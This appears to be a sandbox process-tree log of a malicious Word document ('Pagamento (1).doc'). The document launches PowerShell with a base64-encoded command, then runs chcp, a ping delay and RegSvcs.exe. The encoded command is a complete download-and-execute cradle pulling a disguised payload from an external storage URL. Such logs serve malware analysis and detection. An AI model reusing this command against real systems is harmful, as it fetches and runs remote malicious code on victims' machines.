WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\test22\AppData\Local\Temp\Pagamento (1).doc"
3036powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
2184chcp.com chcp 65001
2380PING.EXE ping -n 10 localhost
2464RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2356